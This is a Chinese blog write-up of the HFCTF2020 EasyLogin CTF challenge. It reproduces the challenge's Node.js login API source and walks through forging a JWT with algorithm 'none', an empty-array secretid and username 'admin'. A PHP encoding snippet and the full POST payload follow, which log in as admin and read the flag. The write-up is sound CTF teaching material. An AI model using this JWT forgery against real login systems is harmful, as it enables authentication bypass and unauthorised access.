[HFCTF2020]EasyLogin

最新推荐文章于 2024-08-14 12:45:22 发布
最新推荐文章于 2024-08-14 12:45:22 发布
阅读量38 收藏
点赞数
文章标签: 前端 javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/133061936
版权

知识点

  • jwt

登录界面

随便注册一个账户登录一下

看到有get flag,但是没有权限读取

F12查看源码,在source里看到app.js

没有什么思路,看了一下wp,得知要读取controllers/api.js

拿到源码

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

注册的时候,用户名不能为admin,然后生成jwt令牌

登录的时候,校验相应的jwt令牌

获取flag的时候,要求用户名为admin

登录时进行抓包

看到authorization处即为jwt令牌,放入https://jwt.io/中进行解析

伪造一下jwt

<?php
$a = '{"alg":"none","typ":"JWT"}';
$b = '{"secretid":[],"username":"admin","password":"123456","iat":1590582025}';
echo base64_encode($a);
echo "\n";
echo base64_encode($b);
#eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=
#eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTU5MDU4MjAyNX0=
?>

将密码算法设置为空,中间的secretid设为空数组,username设成admin,最后的校验部分因为密码算法设置为空,所以不需要了,但是点号.要留着

另外,上面base64编码中的空格要去掉

最后post数据

username=admin&password=123456&authorization=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTU5MDU4MjAyNX0.

然后登录进去点击get_flag获取flag即可

参考https://www.zhaoj.in/read-6512.html

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[HFCTF2020]EasyLogin -wp
freerats的博客
07-29 2277
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js 访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。 在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞 这里需要对koa框架的目录有一定的了解 其中controllers目录是项目控制器存放目录:接受请求,处理逻辑 访问controllers/api.js发现处理逻辑 const crypto = require('.
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
easy_login通关思路
m0_61506558的博客
09-25 1035
可以大致分为垂直越权,通过JWP令牌验证绕过的方式,最终拿到flag(一)环境准备。
[HFCTF2020]EasyLogin JWT认证
qq_54929891的博客
03-31 2749
这里记录一下我写题和学习的过程,具体对JWT还是不太了解的,希望大佬们指点一二 注册账号密码后在登陆的地方抓了个包 发现一个authorization授权,cookie里面有两个参数,感觉这个题应该考的是认证方面的,要用管理员的账户登陆进去才能获得flag,在flag界面只有一个js文件,打开看看 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username =
BUUCTF---[HFCTF2020]EasyLogin保姆级详解。
m0_62107966的博客
09-11 1324
zhehco--BUUCTF---[HFCTF2020]EasyLogin保姆级详解。按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问。重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。
[HFCTF2020]EasyLogin(nodejs入门)
qq_44657899的博客
10-13 1969
在做这道题之前,完全不会nodejs。于是这道题也看不懂,于是打算学习学习nodejs。 文章目录app.js代码学习第一部分第二部分第三部分第四部分controllers/api.js部分学习 app.js代码学习 首先是/static/js/app.js的代码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
[HFCTF2020]JustEscape
shinygod的博客
04-12 556
知识点:vm2沙盒逃逸 提示了一个run.php文件,没法利用,eval里的就不是一个变量。 <?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 凑得处可以计算。 Error().stack测下
[HFCTF2020]EasyLogin --不会编程崽
不会编程的崽的博客
02-22 561
koa&jwt伪造
[HFCTF2020]EasyLogin(node.js的koa框架、jwt攻击方法)
qq_44111753的博客
02-11 422
1、node.js koa的主要框架目录 创建一个rest-hello的工程,结构; 2、jwt攻击方法 深入了解Json Web Token之概念篇 深入了解Json Web Token之实战篇 总的来说,jwt由三部分组成:Header.Payload.Signature。攻击的办法之一可以把header中alg字段更改为’none’,且Payload的secretid为空,即没有Signature 因为sid为空时,jwt将采用none algorithm解密,即对应了将alg='none’的加密
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
CTF 湖湘杯 决赛 2021 final.zip
12-07
【CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
第13周做题记录1
08-08
第二个挑战是HFCTF 2021 Final的hatenum。在这个挑战中,源代码被直接提供,我们需要寻找SQL注入的漏洞。登录过程的SQL查询语句在用户输入的用户名和密码未经充分过滤的情况下直接插入,这为SQL注入提供了可能。虽然...
ASP.NET Core Web API 使用Autofac框架
鲤籽鲲的博客
08-08 563
ASP.NET Core Web API 使用Autofac框架
Vue3 Suspense 和 defineAsyncComponent 结合使用方法
qq_30193097的博客
08-13 198
定义一个异步组件,它在运行时是懒加载的。参数可以是一个异步加载函数,或是对加载行为进行更具体定制的一个选项对象。用于协调对组件树中嵌套的异步依赖的处理。上述案例可以实现大型项目的骨架屏效果。
前端JS总结(中)
m0_54066656的博客
08-12 685
前端JS之内置对象总结,这很重要!!!
使用WebSocket实现一个简易的聊天室
最新发布
qq_51321722的博客
08-14 194
其次,要有相关配置类以及Controller。我这里的框架是SpringBoot。首先,我们要有一个前端页面。
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 492
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值